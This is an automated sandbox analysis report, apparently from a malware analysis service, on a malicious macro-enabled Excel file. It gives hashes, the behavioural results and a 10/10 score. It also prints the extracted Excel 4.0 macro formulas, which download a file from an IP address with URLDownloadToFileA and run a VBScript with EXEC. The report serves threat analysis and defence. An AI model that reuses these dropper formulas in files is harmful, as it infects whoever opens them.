General
-
Target
07dedafd0fe71a813713ff615bae1f48
-
Size
6KB
-
Sample
231221-1q8qwshggk
-
MD5
07dedafd0fe71a813713ff615bae1f48
-
SHA1
7e3cca6c59a38c5d50d28bfaf02f45feae37260b
-
SHA256
0da5b46bf686558b3967dae7ffa2e6eb7795810815a0b155805716d771052140
-
SHA512
761a50ff2b17a2c2618589530d0b0f73ef442ff3b8160b69401b36eb636a501e44d2502913a4ac41491856c6b4ce8d6d02a4b1c880edc4595d5d2fb7fda7417e
-
SSDEEP
192:NDSJuSXbrA2OmmfRa8UhHFBFYuEb98ypkPk9z+3:NiuEM2wc1FY9b98ypkPk9M
Static task
static1
Behavioral task
behavioral1
Sample
07dedafd0fe71a813713ff615bae1f48.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
07dedafd0fe71a813713ff615bae1f48.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Target
07dedafd0fe71a813713ff615bae1f48
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-